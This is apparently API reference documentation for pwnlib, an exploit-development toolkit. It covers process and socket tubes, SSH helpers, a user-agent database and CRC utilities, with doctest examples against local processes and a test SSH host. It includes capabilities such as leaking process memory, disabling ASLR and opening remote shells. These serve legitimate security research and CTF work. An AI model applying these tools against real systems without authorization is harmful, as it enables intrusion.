>>> p = process('python2') >>> p.sendline("print 'Hello world'") >>> p.sendline("print 'Wow, such data'"); >>> '' == p.recv(timeout=0.01) True >>> p.shutdown('send') >>> p.proc.stdin.closed True >>> p.connected('send') False >>> p.recvline() 'Hello world\n' >>> p.recvuntil(',') 'Wow,' >>> p.recvregex('.*data') ' such data' >>> p.recv() '\n' >>> p.recv() Traceback (most recent call last): ... EOFError
>>> p = process('cat') >>> d = open('/dev/urandom').read(4096) >>> p.recv(timeout=0.1) '' >>> p.write(d) >>> p.recvrepeat(0.1) == d True >>> p.recv(timeout=0.1) '' >>> p.shutdown('send') >>> p.wait_for_close() >>> p.poll() 0
>>> p = process('cat /dev/zero | head -c8', shell=True, stderr=open('/dev/null', 'w+')) >>> p.recv() '\x00\x00\x00\x00\x00\x00\x00\x00'
>>> p = process(['python','-c','import os; print os.read(2,1024)'], ... preexec_fn = lambda: os.dup2(0,2)) >>> p.sendline('hello') >>> p.recvline() 'hello\n'
>>> stack_smashing = ['python','-c','open("/dev/tty","wb").write("stack smashing detected")'] >>> process(stack_smashing).recvall() 'stack smashing detected'
>>> PIPE=subprocess.PIPE >>> process(stack_smashing, stdout=PIPE).recvall() ''
>>> getpass = ['python','-c','import getpass; print getpass.getpass("XXX")'] >>> p = process(getpass, stdin=process.PTY) >>> p.recv() 'XXX' >>> p.sendline('hunter2') >>> p.recvall() '\nhunter2\n'
>>> process('echo hello 1>&2', shell=True).recvall() 'hello\n'
>>> process('echo hello 1>&2', shell=True, stderr=PIPE).recvall() ''
>>> a = process(['cat', '/proc/self/maps']).recvall() >>> b = process(['cat', '/proc/self/maps'], aslr=False).recvall() >>> with context.local(aslr=False): ... c = process(['cat', '/proc/self/maps']).recvall() >>> a == b False >>> b == c True
>>> process(['sh','-c','ulimit -s'], aslr=0).recvline() 'unlimited\n'
-
communicate
(stdin = None) → str[source]¶ Calls
subprocess.Popen.communicate()
method on the process.
-
leak
(address, count=0)[source]¶ Leaks memory within the process at the specified address.
Parameters:
-
libc
[source]¶ Returns an ELF for the libc for the current process. If possible, it is adjusted to the correct address automatically.
-
libs
() → dict[source]¶ Return a dictionary mapping the path of each shared library loaded by the process to the address it is loaded at in the process’ address space.
If
/proc/$PID/maps
for the process cannot be accessed, the output ofldd
alone is used. This may give inaccurate results if ASLR is enabled.
-
poll
(block = False) → int[source]¶ Parameters: block (bool) – Wait for the process to exit Poll the exit code of the process. Will return None, if the process has not yet finished and the exit code otherwise.
-
proc
= None[source] subprocess.Popen object
pwnlib.tubes.serialtube
— Serial Ports¶
pwnlib.tubes.sock
— Sockets¶
-
class
pwnlib.tubes.sock.
sock
[source]¶ Bases:
pwnlib.tubes.tube.tube
Methods available exclusively to sockets.
-
class
pwnlib.tubes.remote.
remote
(host, port, fam='any', typ='tcp', timeout=pwnlib.timeout.Timeout.default, ssl=False, sock=None, level=None)[source]¶ Bases:
pwnlib.tubes.sock.sock
Creates a TCP or UDP-connection to a remote host. It supports both IPv4 and IPv6.
The returned object supports all the methods from
pwnlib.tubes.sock
andpwnlib.tubes.tube
.Parameters: - host (str) – The host to connect to.
- port (int) – The port to connect to.
- fam – The string “any”, “ipv4” or “ipv6” or an integer to pass to
socket.getaddrinfo()
. - typ – The string “tcp” or “udp” or an integer to pass to
socket.getaddrinfo()
. - timeout – A positive number, None or the string “default”.
- ssl (bool) – Wrap the socket with SSL
- sock (socket) – Socket to inherit, rather than connecting
Examples
>>> r = remote('google.com', 443, ssl=True) >>> r.send('GET /\r\n\r\n') >>> r.recvn(4) 'HTTP' >>> r = remote('127.0.0.1', 1) Traceback (most recent call last): ... PwnlibException: Could not connect to 127.0.0.1 on port 1 >>> import socket >>> s = socket.socket() >>> s.connect(('google.com', 80)) >>> s.send('GET /' + '\r\n'*2) 9 >>> r = remote.fromsocket(s) >>> r.recvn(4) 'HTTP'
-
class
pwnlib.tubes.listen.
listen
(port=0, bindaddr='0.0.0.0', fam='any', typ='tcp', timeout=pwnlib.timeout.Timeout.default, level=None)[source]¶ Bases:
pwnlib.tubes.sock.sock
Creates an TCP or UDP-socket to receive data on. It supports both IPv4 and IPv6.
The returned object supports all the methods from
pwnlib.tubes.sock
andpwnlib.tubes.tube
.Parameters: - port (int) – The port to connect to.
- bindaddr (str) – The address to bind to.
- fam – The string “any”, “ipv4” or “ipv6” or an integer to pass to
socket.getaddrinfo()
. - typ – The string “tcp” or “udp” or an integer to pass to
socket.getaddrinfo()
. - timeout – A positive number, None
pwnlib.tubes.ssh
— SSH¶
-
class
pwnlib.tubes.ssh.
ssh
(user, host, port=22, password=None, key=None, keyfile=None, proxy_command=None, proxy_sock=None, timeout=pwnlib.timeout.Timeout.default, level=None, cache=True, ssh_agent=False)[source]¶ -
-
connect_remote
(host, port, timeout = Timeout.default) → ssh_connecter[source]¶ Connects to a host through an SSH connection. This is equivalent to using the
-L
flag onssh
.Returns a
pwnlib.tubes.ssh.ssh_connecter
object.Examples
>>> from pwn import * >>> l = listen() >>> s = ssh(host='example.pwnme', ... user='travis', ... password='demopass') >>> a = s.connect_remote(s.host, l.lport) >>> b = l.wait_for_connection() >>> a.sendline('Hello') >>> print repr(b.recvline()) 'Hello\n'
-
connected
()[source]¶ Returns True if we are connected.
Example
>>> s = ssh(host='example.pwnme', ... user='travis', ... password='demopass') >>> s.connected() True >>> s.close() >>> s.connected() False
-
download_data
(remote)[source]¶ Downloads a file from the remote server and returns it as a string.
Parameters: remote (str) – The remote filename to download. Examples
>>> with file('/tmp/bar','w+') as f: ... f.write('Hello, world') >>> s = ssh(host='example.pwnme', ... user='travis', ... password='demopass', ... cache=False) >>> s.download_data('/tmp/bar') 'Hello, world' >>> s._sftp = None >>> s._tried_sftp = True >>> s.download_data('/tmp/bar') 'Hello, world'
-
download_dir
(remote=None, local=None)[source]¶ Recursively downloads a directory from the remote server
Parameters: - local – Local directory
- remote – Remote directory
-
download_file
(remote, local=None)[source]¶ Downloads a file from the remote server.
The file is cached in /tmp/binjitsu-ssh-cache using a hash of the file, so calling the function twice has little overhead.
Parameters:
-
getenv
(variable, **kwargs)[source]¶ Retrieve the address of an environment variable on the remote system.
Note
The exact address will differ based on what other environment variables are set, as well as argv[0]. In order to ensure that the path is exactly the same, it is recommended to invoke the process with
argv=[]
.Example
>>> s = ssh(host='example.pwnme', ... user='travis', ... password='demopass', ... cache=False) >>>
-
interactive
(shell=None)[source]¶ Create an interactive session.
This is a simple wrapper for creating a new
pwnlib.tubes.ssh.ssh_channel
object and callingpwnlib.tubes.ssh.ssh_channel.interactive()
on it.
-
libs
(remote, directory=None)[source]¶ Downloads the libraries referred to by a file.
This is done by running ldd on the remote server, parsing the output and downloading the relevant files.
The directory argument specified where to download the files. This defaults to ‘./$HOSTNAME’ where $HOSTNAME is the hostname of the remote server.
-
listen
(port=0, bind_address='', timeout=pwnlib.timeout.Timeout.default)[source]¶ listen_remote(port = 0, bind_address = ‘’, timeout = Timeout.default) -> ssh_connecter
Listens remotely through an SSH connection. This is equivalent to using the
-R
flag onssh
.Returns a
pwnlib.tubes.ssh.ssh_listener
object.Examples
>>> from pwn import * >>> s = ssh(host='example.pwnme', ... user='travis', ... password='demopass') >>> l = s.listen_remote() >>> a = remote(s.host, l.port) >>> b = l.wait_for_connection() >>> a.sendline('Hello') >>> print repr(b.recvline()) 'Hello\n'
-
listen_remote
(port = 0, bind_address = '', timeout = Timeout.default) → ssh_connecter[source]¶ Listens remotely through an SSH connection. This is equivalent to using the
-R
flag onssh
.Returns a
pwnlib.tubes.ssh.ssh_listener
object.Examples
>>> from pwn import * >>> s = ssh(host='example.pwnme', ... user='travis', ... password='demopass') >>> l = s.listen_remote() >>> a = remote(s.host, l.port) >>> b = l.wait_for_connection() >>> a.sendline('Hello') >>> print repr(b.recvline()) 'Hello\n'
-
process
(argv=None, executable=None, tty=True, cwd=None, env=None, timeout=pwnlib.timeout.Timeout.default, run=True, stdin=0, stdout=1, stderr=2, preexec_fn=None, preexec_args=[], raw=True, aslr=None, setuid=None)[source]¶ Executes a process on the remote server, in the same fashion as pwnlib.tubes.process.process.
To achieve this, a Python script is created to call
os.execve
with the appropriate arguments.As an added bonus, the
ssh_channel
object returned has apid
property for the process pid.Parameters: - argv (list) – List of arguments to pass into the process
- executable (str) – Path to the executable to run.
If
None
,argv[0]
is used. - tty (bool) – Request a tty from the server. This usually fixes buffering problems by causing libc to write data immediately rather than buffering it. However, this disables interpretation of control codes (e.g. Ctrl+C) and breaks .shutdown.
- cwd (str) – Working directory. If
None
, uses the working directory specified oncwd
or set viaset_working_directory()
. - env (dict) – Environment variables to set in the child. If
None
, inherits the default environment. - timeout (int) – Timeout to set on the tube created to interact with the process.
- run (bool) – Set to
True
to run the program (default). IfFalse
, returns the path to an executable Python script on the remote server which, when executed, will do it. - stdin (int, str) – If an integer, replace stdin with the numbered file descriptor.
If a string, a open a file with the specified path and replace
stdin with its file descriptor. May also be one of
sys.stdin
,sys.stdout
,sys.stderr
. IfNone
, the file descriptor is closed. - stdout (int, str) – See
stdin
. - stderr (int, str) – See
stdin
. - preexec_fn (callable) – Function which is executed on the remote side before execve().
- preexec_args (object) – Argument passed to
preexec_fn
. - raw (bool) – If
True
, disable TTY control code interpretation. - aslr (bool) – See
pwnlib.tubes.process.process
for more information. - setuid (bool) – See
pwnlib.tubes.process.process
for more information.
Returns: A new SSH channel, or a path to a script if
run=False
.Notes
Requires Python on the remote server.
Examples
>>> s = ssh(host='example.pwnme', ... user='travis', ... password='demopass') >>> sh = s.process('/bin/sh', env={'PS1':''}) >>> sh.sendline('echo Hello; exit') >>> sh.recvall() 'Hello\n' >>> s.process(['/bin/echo', '\xff']).recvall() '\xff\n' >>> s.process(['readlink', '/proc/self/exe']).recvall() '/bin/readlink\n' >>> s.process(['LOLOLOL', '/proc/self/exe'], executable='readlink').recvall() '/bin/readlink\n' >>> s.process(['LOLOLOL\x00', '/proc/self/cmdline'], executable='cat').recvall() 'LOLOLOL\x00/proc/self/cmdline\x00' >>> sh = s.process(executable='/bin/sh') >>> sh.pid in pidof('sh') True >>> s.process(['pwd'], cwd='/tmp').recvall() '/tmp\n' >>> p = s.process(['python','-c','import os; print os.read(2, 1024)'], stderr=0) >>> p.send('hello') >>> p.recv() 'hello\n' >>> s.process(['/bin/echo', 'hello']).recvall() 'hello\n' >>> s.process(['/bin/echo', 'hello'], stdout='/dev/null').recvall() '' >>> s.process(['/usr/bin/env'], env={}).recvall() '' >>> s.process('/usr/bin/env', env={'A':'B'}).recvall() 'A=B\n'
-
remote
(host, port, timeout=pwnlib.timeout.Timeout.default)[source]¶ connect_remote(host, port, timeout = Timeout.default) -> ssh_connecter
Connects to a host through an SSH connection. This is equivalent to using the
-L
flag onssh
.Returns a
pwnlib.tubes.ssh.ssh_connecter
object.Examples
>>> from pwn import * >>> l = listen() >>> s = ssh(host='example.pwnme', ... user='travis', ... password='demopass') >>> a = s.connect_remote(s.host, l.lport) >>> b = l.wait_for_connection() >>> a.sendline('Hello') >>> print repr(b.recvline()) 'Hello\n'
-
run
(process, tty=True, wd=None, env=None, timeout=pwnlib.timeout.Timeout.default, raw=True)[source]¶ Backward compatibility. Use
system()
-
run_to_end
(process, tty = False, timeout = Timeout.default, env = None) → str[source]¶ Run a command on the remote server and return a tuple with (data, exit_status). If tty is True, then the command is run inside a TTY on the remote server.
Examples
>>> s = ssh(host='example.pwnme', ... user='travis', ... password='demopass') >>> print s.run_to_end('echo Hello; exit 17') ('Hello\n', 17)
-
set_working_directory
(wd=None)[source]¶ Sets the working directory in which future commands will be run (via ssh.run) and to which files will be uploaded/downloaded from if no path is provided
Note
This uses
mktemp -d
under the covers, sets permissions on the directory to0700
. This means that setuid binaries will not be able to access files created in this directory.In order to work around this, we also
chmod +x
the directory.Parameters: wd (string) – Working directory. Default is to auto-generate a directory based on the result of running ‘mktemp -d’ on the remote machine. Examples
>>> s = ssh(host='example.pwnme', ... user='travis', ... password='demopass') >>> cwd = s.set_working_directory() >>> s.ls() '' >>> s.pwd() == cwd True
-
sftp
[source]¶ Paramiko SFTPClient object which is used for file transfers. Set to
None
to disablesftp
.
-
shell
(shell = None, tty = True, timeout = Timeout.default) → ssh_channel[source]¶ Open a new channel with a shell inside.
Parameters: Returns: Return a
pwnlib.tubes.ssh.ssh_channel
object.Examples
>>> s = ssh(host='example.pwnme', ... user='travis', ... password='demopass') >>> sh = s.shell('/bin/sh') >>> sh.sendline('echo Hello; exit') >>> print 'Hello' in sh.recvall() True
-
system
(process, tty = True, wd = None, env = None, timeout = Timeout.default, raw = True) → ssh_channel[source]¶ Open a new channel with a specific process inside. If tty is True, then a TTY is requested on the remote server.
If raw is True, terminal control codes are ignored and input is not echoed back.
Return a
pwnlib.tubes.ssh.ssh_channel
object.Examples
>>> s = ssh(host='example.pwnme', ... user='travis', ... password='demopass') >>> py = s.run('python -i') >>> _ = py.recvuntil('>>> ') >>> py.sendline('print 2+2') >>> py.sendline('exit') >>> print repr(py.recvline()) '4\n'
-
upload_data
(data, remote)[source]¶ Uploads some data into a file on the remote server.
Parameters: Example
>>> s = ssh(host='example.pwnme', ... user='travis', ... password='demopass') >>> s.upload_data('Hello, world', '/tmp/upload_foo') >>> print file('/tmp/upload_foo').read() Hello, world >>> s._sftp = False >>> s._tried_sftp = True >>> s.upload_data('Hello, world', '/tmp/upload_bar') >>> print file('/tmp/upload_bar').read() Hello, world
-
upload_dir
(local, remote=None)[source]¶ Recursively uploads a directory onto the remote server
Parameters: - local – Local directory
- remote – Remote directory
-
-
class
pwnlib.tubes.ssh.
ssh_channel
[source]¶ Bases:
pwnlib.tubes.sock.sock
-
interactive
(prompt = pwnlib.term.text.bold_red('$') + ' ')[source]¶ If not in TTY-mode, this does exactly the same as meth:pwnlib.tubes.tube.tube.interactive, otherwise it does mostly the same.
An SSH connection in TTY-mode will typically supply its own prompt, thus the prompt argument is ignored in this case. We also have a few SSH-specific hacks that will ideally be removed once the
pwnlib.term
is more mature.
-
-
class
pwnlib.tubes.ssh.
ssh_connecter
[source]¶ Bases:
pwnlib.tubes.sock.sock
-
class
pwnlib.tubes.ssh.
ssh_listener
[source]¶ Bases:
pwnlib.tubes.sock.sock
pwnlib.tubes.tube
— Common Functionality¶
-
class
pwnlib.tubes.tube.
tube
[source]¶ Container of all the tube functions common to sockets, TTYs and SSH connetions.
-
can_recv
(timeout = 0) → bool[source]¶ Returns True, if there is data available within timeout seconds.
Examples
>>> import time >>> t = tube() >>> t.can_recv_raw = lambda *a: False >>> t.can_recv() False >>> _=t.unrecv('data') >>> t.can_recv() True >>> _=t.recv() >>> t.can_recv() False
-
clean
(timeout = 0.05)[source]¶ Removes all the buffered data from a tube by calling
pwnlib.tubes.tube.tube.recv()
with a low timeout until it fails.If
timeout
is zero, only cached data will be cleared.Note: If timeout is set to zero, the underlying network is not actually polled; only the internal buffer is cleared.
Returns: All data received Examples
>>> t = tube() >>> t.unrecv('clean me up') >>> t.clean(0) 'clean me up' >>> len(t.buffer) 0
-
clean_and_log
(timeout = 0.05)[source]¶ Works exactly as
pwnlib.tubes.tube.tube.clean()
, but logs recieved data withpwnlib.self.info()
.Returns: All data received Examples
>>> def recv(n, data=['', 'hooray_data']): ... while data: return data.pop() >>> t = tube() >>> t.recv_raw = recv >>> t.connected_raw = lambda d: True >>> t.fileno = lambda: 1234 >>> with context.local(log_level='info'): ... data = t.clean_and_log() [DEBUG] Received 0xb bytes: 'hooray_data' >>> data 'hooray_data' >>> context.clear()
-
connect_input
(other)[source]¶ Connects the input of this tube to the output of another tube object.
Examples
>>> def p(x): print x >>> def recvone(n, data=['data']): ... while data: return data.pop() ... raise EOFError >>> a = tube() >>> b = tube() >>> a.recv_raw = recvone >>> b.send_raw = p >>> a.connected_raw = lambda d: True >>> b.connected_raw = lambda d: True >>> a.shutdown = lambda d: True >>> b.shutdown = lambda d: True >>> import time >>> _=(b.connect_input(a), time.sleep(0.1)) data
-
connect_output
(other)[source]¶ Connects the output of this tube to the input of another tube object.
Examples
>>> def p(x): print x >>> def recvone(n, data=['data']): ... while data: return data.pop() ... raise EOFError >>> a = tube() >>> b = tube() >>> a.recv_raw = recvone >>> b.send_raw = p >>> a.connected_raw = lambda d: True >>> b.connected_raw = lambda d: True >>> a.shutdown = lambda d: True >>> b.shutdown = lambda d: True >>> _=(a.connect_output(b), time.sleep(0.1)) data
-
connected
(direction = 'any') → bool[source]¶ Returns True if the tube is connected in the specified direction.
Parameters: direction (str) – Can be the string ‘any’, ‘in’, ‘read’, ‘recv’, ‘out’, ‘write’, ‘send’. Doctest:
>>> def p(x): print x >>> t = tube() >>> t.connected_raw = p >>> _=map(t.connected, ('any', 'in', 'read', 'recv', 'out', 'write', 'send')) any recv recv recv send send send >>> t.connected('bad_value') Traceback (most recent call last): ... KeyError: "direction must be in ['any', 'in', 'out', 'read', 'recv', 'send', 'write']"
-
connected_raw
(direction)[source]¶ connected(direction = ‘any’) -> bool
Should not be called directly. Returns True iff the tube is connected in the given direction.
-
interactive
(prompt = pwnlib.term.text.bold_red('$') + ' ')[source]¶ Does simultaneous reading and writing to the tube. In principle this just connects the tube to standard in and standard out, but in practice this is much more usable, since we are using
pwnlib.term
to print a floating prompt.Thus it only works in while in
pwnlib.term.term_mode
.
-
newline
= '\n'[source]¶ Delimiter to use for
sendline()
,recvline()
, and related functions.
-
recv
(numb = 4096, timeout = default) → str[source]¶ Receives up to numb bytes of data from the tube, and returns as soon as any quantity of data is available.
If the request is not satisfied before
timeout
seconds pass, all data is buffered and an empty string (''
) is returned.Raises: exceptions.EOFError
– The connection is closedReturns: A string containing bytes received from the socket, or ''
if a timeout occurred while waiting.Examples
>>> t = tube() >>> # Fake a data source >>> t.recv_raw = lambda n: 'Hello, world' >>> t.recv() == 'Hello, world' True >>> t.unrecv('Woohoo') >>> t.recv() == 'Woohoo' True >>> with context.local(log_level='debug'): ... _ = t.recv() [...] Received 0xc bytes: 'Hello, world'
-
recvline
(keepends = True) → str[source]¶ Receive a single line from the tube.
A “line” is any sequence of bytes terminated by the byte sequence set in
newline
, which defaults to'\n'
.If the request is not satisfied before
timeout
seconds pass, all data is buffered and an empty string (''
) is returned.Parameters: Returns: All bytes received over the tube until the first newline
'\n'
is received. Optionally retains the ending.Examples
>>> t = tube() >>> t.recv_raw = lambda n: 'Foo\nBar\r\nBaz\n' >>> t.recvline() 'Foo\n' >>> t.recvline() 'Bar\r\n' >>> t.recvline(keepends = False) 'Baz' >>> t.newline = '\r\n' >>> t.recvline(keepends = False) 'Foo\nBar'
-
recvline_contains
(items, keepends=False, timeout=pwnlib.timeout.Timeout.default)[source]¶ Receive lines until one line is found which contains at least one of items.
Parameters: Examples
>>> t = tube() >>> t.recv_raw = lambda n: "Hello\nWorld\nXylophone\n" >>> t.recvline_contains('r') 'World' >>> f = lambda n: "cat dog bird\napple pear orange\nbicycle car train\n" >>> t = tube() >>> t.recv_raw = f >>> t.recvline_contains('pear') 'apple pear orange' >>> t = tube() >>> t.recv_raw = f >>> t.recvline_contains(('car', 'train')) 'bicycle car train'
-
recvline_endswith
(delims, keepends = False, timeout = default) → str[source]¶ Keep recieving lines until one is found that starts with one of delims. Returns the last line recieved.
If the request is not satisfied before
timeout
seconds pass, all data is buffered and an empty string (''
) is returned.See
recvline_startswith()
for more details.Examples
>>> t = tube() >>> t.recv_raw = lambda n: 'Foo\nBar\nBaz\nKaboodle\n' >>> t.recvline_endswith('r') 'Bar' >>> t.recvline_endswith(tuple('abcde'), True) 'Kaboodle\n' >>> t.recvline_endswith('oodle') 'Kaboodle'
-
recvline_pred
(pred, keepends = False) → str[source]¶ Receive data until
pred(line)
returns a truthy value. Drop all other data.If the request is not satisfied before
timeout
seconds pass, all data is buffered and an empty string (''
) is returned.Parameters: pred (callable) – Function to call. Returns the line for which this function returns True
.Examples
>>> t = tube() >>> t.recv_raw = lambda n: "Foo\nBar\nBaz\n" >>> t.recvline_pred(lambda line: line == "Bar\n") 'Bar' >>> t.recvline_pred(lambda line: line == "Bar\n", keepends=True) 'Bar\n' >>> t.recvline_pred(lambda line: line == 'Nope!', timeout=0.1) ''
-
recvline_regex
(regex, exact=False, keepends=False, timeout=pwnlib.timeout.Timeout.default)[source]¶ recvregex(regex, exact = False, keepends = False, timeout = default) -> str
Wrapper around
recvline_pred()
, which will return when a regex matches a line.By default
re.RegexObject.search()
is used, but if exact is set to True, thenre.RegexObject.match()
will be used instead.If the request is not satisfied before
timeout
seconds pass, all data is buffered and an empty string (''
) is returned.
-
recvline_startswith
(delims, keepends = False, timeout = default) → str[source]¶ Keep recieving lines until one is found that starts with one of delims. Returns the last line recieved.
If the request is not satisfied before
timeout
seconds pass, all data is buffered and an empty string (''
) is returned.Parameters: Returns: The first line received which starts with a delimiter in
delims
.Examples
>>> t = tube() >>> t.recv_raw = lambda n: "Hello\nWorld\nXylophone\n" >>> t.recvline_startswith(tuple('WXYZ')) 'World' >>> t.recvline_startswith(tuple('WXYZ'), True) 'Xylophone\n' >>> t.recvline_startswith('Wo') 'World'
-
recvlines
(numlines, keepends = False, timeout = default) → str list[source]¶ Recieve up to
numlines
lines.A “line” is any sequence of bytes terminated by the byte sequence set by
newline
, which defaults to'\n'
.If the request is not satisfied before
timeout
seconds pass, all data is buffered and an empty string (''
) is returned.Parameters: Raises: exceptions.EOFError
– The connection closed before the request could be satisfiedReturns: A string containing bytes received from the socket, or
''
if a timeout occurred while waiting.Examples
>>> t = tube() >>> t.recv_raw = lambda n: '\n' >>> t.recvlines(3) ['', '', ''] >>> t.recv_raw = lambda n: 'Foo\nBar\nBaz\n' >>> t.recvlines(3) ['Foo', 'Bar', 'Baz'] >>> t.recvlines(3, True) ['Foo\n', 'Bar\n', 'Baz\n']
-
recvn
(numb, timeout = default) → str[source]¶ Recieves exactly n bytes.
If the request is not satisfied before
timeout
seconds pass, all data is buffered and an empty string (''
) is returned.Raises: exceptions.EOFError
– The connection closed before the request could be satisfiedReturns: A string containing bytes received from the socket, or ''
if a timeout occurred while waiting.Examples
>>> t = tube() >>> data = 'hello world' >>> t.recv_raw = lambda *a: data >>> t.recvn(len(data)) == data True >>> t.recvn(len(data)+1) == data + data[0] True >>> t.recv_raw = lambda *a: None >>> # The remaining data is buffered >>> t.recv() == data[1:] True >>> t.recv_raw = lambda *a: time.sleep(0.01) or 'a' >>> t.recvn(10, timeout=0.05) '' >>> t.recvn(10, timeout=0.06) 'aaaaaa...'
-
recvpred
(pred, timeout = default) → str[source]¶ Receives one byte at a time from the tube, until
pred(bytes)
evaluates to True.If the request is not satisfied before
timeout
seconds pass, all data is buffered and an empty string (''
) is returned.Parameters: Raises: exceptions.EOFError
– The connection is closedReturns: A string containing bytes received from the socket, or
''
if a timeout occurred while waiting.
-
recvregex
(regex, exact = False, timeout = default) → str[source]¶ Wrapper around
recvpred()
, which will return when a regex matches the string in the buffer.By default
re.RegexObject.search()
is used, but if exact is set to True, thenre.RegexObject.match()
will be used instead.If the request is not satisfied before
timeout
seconds pass, all data is buffered and an empty string (''
) is returned.
-
recvrepeat
()[source]¶ Receives data until a timeout or EOF is reached.
Examples
>>> data = [ ... 'd', ... '', # simulate timeout ... 'c', ... 'b', ... 'a', ... ] >>> def delayrecv(n, data=data): ... return data.pop() >>> t = tube() >>> t.recv_raw = delayrecv >>> t.recvrepeat(0.2) 'abc' >>> t.recv() 'd'
-
recvuntil
(delims, timeout = default) → str[source]¶ Recieve data until one of delims is encountered.
If the request is not satisfied before
timeout
seconds pass, all data is buffered and an empty string (''
) is returned.Parameters: - delims (str,tuple) – String of delimiters characters, or list of delimiter strings.
- drop (bool) – Drop the ending. If
True
it is removed from the end of the return value.
Raises: exceptions.EOFError
– The connection closed before the request could be satisfiedReturns: A string containing bytes received from the socket, or
''
if a timeout occurred while waiting.Examples
>>> t = tube() >>> t.recv_raw = lambda n: "Hello World!" >>> t.recvuntil(' ') 'Hello ' >>> _=t.clean(0) >>> # Matches on 'o' in 'Hello' >>> t.recvuntil(tuple(' Wor')) 'Hello' >>> _=t.clean(0) >>> # Matches expressly full string >>> t.recvuntil(' Wor') 'Hello Wor' >>> _=t.clean(0) >>> # Matches on full string, drops match >>> t.recvuntil(' Wor', drop=True) 'Hello' >>> # Try with regex special characters >>> t = tube() >>> t.recv_raw = lambda n: "Hello|World" >>> t.recvuntil('|', drop=True) 'Hello'
-
send
(data)[source]¶ Sends data.
If log level
DEBUG
is enabled, also prints out the data received.If it is not possible to send anymore because of a closed connection, it raises
exceptions.EOFError
Examples
>>> def p(x): print repr(x) >>> t = tube() >>> t.send_raw = p >>> t.send('hello') 'hello'
-
sendafter
(delim, data, timeout = default) → str[source]¶ A combination of
recvuntil(delim, timeout)
andsend(data)
.
-
sendline
(data)[source]¶ Shorthand for
t.send(data + t.newline)
.Examples
>>> def p(x): print repr(x) >>> t = tube() >>> t.send_raw = p >>> t.sendline('hello') 'hello\n' >>> t.newline = '\r\n' >>> t.sendline('hello') 'hello\r\n'
-
sendlineafter
(delim, data, timeout = default) → str[source]¶ A combination of
recvuntil(delim, timeout)
andsendline(data)
.
-
sendlinethen
(delim, data, timeout = default) → str[source]¶ A combination of
sendline(data)
andrecvuntil(delim, timeout)
.
-
sendthen
(delim, data, timeout = default) → str[source]¶ A combination of
send(data)
andrecvuntil(delim, timeout)
.
-
settimeout
(timeout)[source]¶ Set the timeout for receiving operations. If the string “default” is given, then
context.timeout
will be used. If None is given, then there will be no timeout.Examples
>>> t = tube() >>> t.settimeout_raw = lambda t: None >>> t.settimeout(3) >>> t.timeout == 3 True
-
shutdown
(direction = "send")[source]¶ Closes the tube for futher reading or writing depending on direction.
Parameters: direction (str) – Which direction to close; “in”, “read” or “recv” closes the tube in the ingoing direction, “out”, “write” or “send” closes it in the outgoing direction. Returns: None
Examples
>>> def p(x): print x >>> t = tube() >>> t.shutdown_raw = p >>> _=map(t.shutdown, ('in', 'read', 'recv', 'out', 'write', 'send')) recv recv recv send send send >>> t.shutdown('bad_value') Traceback (most recent call last): ... KeyError: "direction must be in ['in', 'out', 'read', 'recv', 'send', 'write']"
-
shutdown_raw
(direction)[source]¶ Should not be called directly. Closes the tube for further reading or writing.
-
spawn_process
(*args, **kwargs)[source]¶ Spawns a new process having this tube as stdin, stdout and stderr.
Takes the same arguments as
subprocess.Popen
.
-
timeout_change
()[source]¶ Informs the raw layer of the tube that the timeout has changed.
Should not be called directly.
Inherited from
Timeout
.
-
pwnlib.ui
— Functions for user interaction¶
-
pwnlib.ui.
more
(text)[source]¶ Shows text like the command line tool
more
.It not in term_mode, just prints the data to the screen.
Parameters: text (str) – The text to show. Returns: None
pwnlib.useragents
— A database of useragent strings¶
Database of >22,000 user agent strings
-
pwnlib.useragents.
getall
() → str set[source]¶ Get all the user agents that we know about.
Parameters: None – Returns: A set of user agent strings. Examples
>>> 'libcurl-agent/1.0' in getall() True >>> 'wget' in getall() True
-
pwnlib.useragents.
random
() → str[source]¶ Get a random user agent string.
Parameters: None – Returns: A random user agent string selected from getall()
.>>> import random as randommod >>> randommod.seed(1) >>> random() 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FunWebProducts; FunWebProducts-MyTotalSearch; iebar)'
pwnlib.util.crc
— Calculating CRC-sums¶
Module for calculating CRC-sums.
Contains all crc implementations know on the interwebz. For most implementations it contains only the core crc algorithm and not e.g. padding schemes.
It is horribly slow, as implements a naive algorithm working direclty on bit polynomials.
The current algorithm is super-linear and takes about 4 seconds to calculate
the crc32-sum of 'A'*40000
.
An obvious optimization would be to actually generate some lookup-tables.
-
pwnlib.util.crc.
generic_crc
(data, polynom, width, init, refin, refout, xorout)[source]¶ A generic CRC-sum function.
This is suitable to use with: http://reveng.sourceforge.net/crc-catalogue/all.htm
The “check” value in the document is the CRC-sum of the string “123456789”.
Parameters: - data (str) – The data to calculate the CRC-sum of. This should either be a string or a list of bits.
- polynom (int) – The polynomial to use.
- init (int) – If the CRC-sum was calculated in hardware, then this would b the initial value of the checksum register.
- refin (bool) – Should the input bytes be reflected?
- refout (bool) – Should the checksum be reflected?
- xorout (int) – The value to xor the checksum with before outputting
-
pwnlib.util.crc.
cksum
(data) → int[source]¶ Calculates the same checksum as returned by the UNIX-tool
cksum
.Parameters: data (str) – The data to checksum. Example
>>> print cksum('123456789') 930766865
-
pwnlib.util.crc.
find_crc_function
(data, checksum)[source]¶ Finds all known CRC functions that hashes a piece of data into a specific checksum. It does this by trying all known CRC functions one after the other.
Parameters: data (str) – Data for which the checksum is known. Example
>>> find_crc_function('test', 46197) [<function crc_crc_16_dnp at ...>]
-
pwnlib.util.crc.
arc
(data) → int[source]¶ Calculates the arc checksum.
This is simply the
generic_crc()
with these frozen arguments:- polynom = 0x8005
- width = 16
- init = 0x0
- refin = True
- refout = True
- xorout = 0x0
See also: http://reveng.sourceforge.net/crc-catalogue/all.htm#crc.cat-bits.16
Parameters: data (str) – The data to checksum. Example
>>> print arc('123456789') 47933
-
pwnlib.util.crc.
crc_10
(data) → int[source]¶ Calculates the crc_10 checksum.
This is simply the
generic_crc()
with these frozen arguments:- polynom = 0x233
- width = 10
- init = 0x0
- refin = False
- refout = False
- xorout = 0x0
See also: http://reveng.sourceforge.net/crc-catalogue/all.htm#crc.cat-bits.10
Parameters: data (str) – The data to checksum. Example
>>> print crc_10('123456789') 409
-
pwnlib.util.crc.
crc_10_cdma2000
(data) → int[source]¶ Calculates the crc_10_cdma2000 checksum.
This is simply the
generic_crc()
with these frozen arguments:- polynom = 0x3d9
- width = 10
- init = 0x3ff
- refin = False
- refout = False
- xorout = 0x0
See also: http://reveng.sourceforge.net/crc-catalogue/all.htm#crc.cat.crc-10-cdma2000
Parameters: data (str) – The data to checksum. Example
>>> print crc_10_cdma2000('123456789') 563
-
